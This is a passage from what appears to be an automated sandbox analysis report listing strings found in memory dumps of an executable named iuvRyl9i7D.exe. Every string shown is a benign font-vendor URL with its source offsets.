Source: iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com
Source: iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comadd
Source: iuvRyl9i7D.exe, 00000000.00000003.247918771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248081116.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248025845.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247762585.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247959832.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247722223.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247738889.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247797263.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247783561.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247944619.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247751500.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247697909.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248000108.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247981605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comdd
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comn-u
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 
00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com.TTF
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/Z
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.htmlZ
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersC
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersV
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250566915.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250528449.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250632388.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250598952.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 
00000000.00000003.250706232.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com:
Source: iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 
00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300243537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF:
Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comFU
Source: iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253383810.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253224001.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253128451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253153122.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253083922.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253314080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253110391.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 
00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253363848.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comI.TTF:
Source: iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250747109.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250726008.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comW.TTF
Source: iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250459267.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalic
Source: iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253054220.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comals(
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdo
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.come.comK
Source: iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256684499.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comgrito
Source: iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comlic
Source: iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251960719.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252004043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.commnF0$
Source: iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 